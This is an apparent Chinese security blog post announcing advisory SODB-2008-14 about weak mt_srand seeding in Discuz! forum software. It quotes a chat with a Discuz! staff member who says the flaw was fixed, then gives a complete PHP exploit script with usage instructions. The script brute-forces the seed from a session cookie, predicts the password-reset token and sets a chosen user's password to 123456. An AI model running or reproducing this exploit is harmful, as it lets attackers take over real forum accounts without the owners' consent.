Posted by Superhei
为庆祝mjj终于被xx了,然后为道哥明天的演出加油,今天发布SODB-2008-14 ,只是具体分析暂时还没公布,有兴趣的人可以先去分析下,具体漏洞是利用的是se牛发现的mt_srand()/srand()-weak seeding ,这个应该还有很多web程序受这个漏洞的影响.这里还有一个小小的8挂,其实早在se在blog上说这个问题的时候,我就问过dz的安全人员,可惜的是他说他们早在n年前补丁了:
SuperHei 说:
dz的有mt_srand的漏洞没
******* 说:
06年就补了
SuperHei 说:
哦? 杂补的
******* 说:
哈哈
******* 说:
php手册写了
SuperHei 说:
杂写的
******* 说:
自己翻
******* 说:
别以为外国人都是走前边 啊
SuperHei 说:
....
SuperHei 说:
你说说你们杂补丁的
SuperHei 说:
先不要说那么多废话
******* 说:
不说
SuperHei 说:
那算了 呵呵
SuperHei 说:
当我算都没说
******* 说:
看到外国人搞啥 然后就来翻国内的程序
******* 说:
哈哈
SuperHei 说:
是啊 只有那水平 没办法啊
******* 说:
- -
******* 说:
那个mt_srand的 在php手册里说明了 所以在php版本大的时候不需要播种了 另外扩大了取值空间 基本是不可能碰出来的了
SuperHei 说:
呵呵
Exploit:
- #!/usr/bin/php
- <?php
- print_r('
- +---------------------------------------------------------------------------+
- Discuz! Reset User Password Exploit
- by 80vul
- team: http://www.80vul.com
- +---------------------------------------------------------------------------+
- ');
- if ($argc < 6) {
- print_r('
- +---------------------------------------------------------------------------+
- Usage: php '.$argv[0].' host path user mail uid
- host: target server (ip/hostname)
- path: path to discuz
- user: user login name
- mail: user login mail
- uid: user login id
- Example:
- php '.$argv[0].' localhost /discuz/ 80vul 80vul@80vul.com 2
- +---------------------------------------------------------------------------+
- ');
- exit;
- }
- error_reporting(7);
- ini_set('max_execution_time', 0);
- $host = $argv[1];
- $path = $argv[2];
- $user = $argv[3];
- $mail = $argv[4];
- $uid = $argv[5];
- $fp = fsockopen($host, 80);
- $data = "GET ".$path."viewthread.php HTTP/1.1\r\n";
- $data .= "Host: $host\r\n";
- $data .= "Keep-Alive: 300\r\n";
- $data .= "Connection: keep-alive\r\n\r\n";
- fputs($fp, $data);
- $resp = '';
- while ($fp && !feof($fp)) {
- $resp .= fread($fp, 1024);
- preg_match('/&formhash=([a-z0-9]{8})/', $resp, $hash);
- if ($hash)
- break;
- }
- if ($hash) {
- $cmd = 'action=lostpasswd&username='.urlencode($user).'&email='.urlencode($mail).'&lostpwsubmit=true&formhash='.$hash[1];
- $data = "POST ".$path."member.php HTTP/1.1\r\n";
- $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
- $data .= "Referer: http://$host$path\r\n";
- $data .= "Host: $host\r\n";
- $data .= "Content-Length: ".strlen($cmd)."\r\n";
- $data .= "Connection: close\r\n\r\n";
- $data .= $cmd;
- fputs($fp, $data);
- $resp = '';
- while ($fp && !feof($fp))
- $resp .= fread($fp, 1024);
- fclose($fp);
- preg_match('/Set-Cookie:\s[a-zA-Z0-9]+_sid=([a-zA-Z0-9]{6});/', $resp, $sid);
- if (!$sid)
- exit("Exploit Failed!\n");
- $seed = getseed();
- if ($seed) {
- mt_srand($seed);
- random();
- mt_rand();
- $id = random();
- $fp = fsockopen($host, 80);
- $cmd = 'action=getpasswd&uid='.$uid.'&id='.$id.'&newpasswd1=123456&newpasswd2=123456&getpwsubmit=true&formhash='.$hash[1];
- $data = "POST ".$path."member.php HTTP/1.1\r\n";
- $data .= "Content-Type: application/x-www-form-urlencoded\r\n";
- $data .= "Referer: http://$host$path\r\n";
- $data .= "Host: $host\r\n";
- $data .= "Content-Length: ".strlen($cmd)."\r\n";
- $data .= "Connection: close\r\n\r\n";
- $data .= $cmd;
- fputs($fp, $data);
- $resp = '';
- while ($fp && !feof($fp))
- $resp .= fread($fp, 1024);
- if (strpos($resp, '您的密码已重新设置,请使用新密码登录。') !== false)
- exit("Expoilt Success!\nUser New Password:\t123456\n");
- else
- exit("Exploit Failed!\n");
- } else
- exit("Exploit Failed!\n");
- } else
- exit("Exploit Failed!\n");
- function getseed()
- {
- global $sid;
- for ($seed = 0; $seed <= 1000000; $seed ++) {
- mt_srand($seed);
- $id = random(6);
- if ($id == $sid[1])
- return $seed;
- }
- return false;
- }
- function random($length = 6)
- {
- $hash = '';
- $chars = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz';
- $max = strlen($chars) - 1;
- for ($i = 0; $i < $length; $i ++)
- $hash .= $chars[mt_rand(0, $max)];
- return $hash;
- }
- ?>
